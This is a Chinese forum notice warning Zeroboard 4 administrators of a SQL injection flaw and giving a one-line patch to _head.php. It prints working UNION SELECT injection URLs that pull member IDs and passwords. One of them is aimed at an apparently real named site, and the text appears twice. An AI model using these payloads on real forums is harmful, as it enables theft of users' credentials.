zb4公告
![[级别:30]](./modules/point/icons/default/30.gif "积分:82665point , 级别:30/30"){kind=icon}
金东峰朋友的提醒:
zb4的密码是采用加密形式,但可以用其他破解程序可以破解,所以请立即更新你得zb4程序。
下面连接可以看到你的会员信息
http://www.yourdomain.com/bbs/zboard.php?id=bbs_ID&s_que=1=0%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_id,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20zetyx_member_table
http://www.e-qingu.com/bbs/board.php?id=humor_bbs&s_que=1=0%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_id,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20zetyx_member_table
^^
修改方法:
在_head.php
if(!eregi("write.php",$PHP_SELF)) {
这个部分修改成
if(!eregi("write.php",$PHP_SELF)) {
unset($s_que); $s_que = ''; // 增加这一行。
杜绝恶意!!!
请务必修改。
zb4的密码是采用加密形式,但可以用其他破解程序可以破解,所以请立即更新你得zb4程序。
下面连接可以看到你的会员信息
http://www.yourdomain.com/bbs/zboard.php?id=bbs_ID&s_que=1=0%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_id,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20zetyx_member_table
http://www.e-qingu.com/bbs/board.php?id=humor_bbs&s_que=1=0%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_id,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20zetyx_member_table
^^
修改方法:
在_head.php
if(!eregi("write.php",$PHP_SELF)) {
这个部分修改成
if(!eregi("write.php",$PHP_SELF)) {
unset($s_que); $s_que = ''; // 增加这一行。
杜绝恶意!!!
请务必修改。
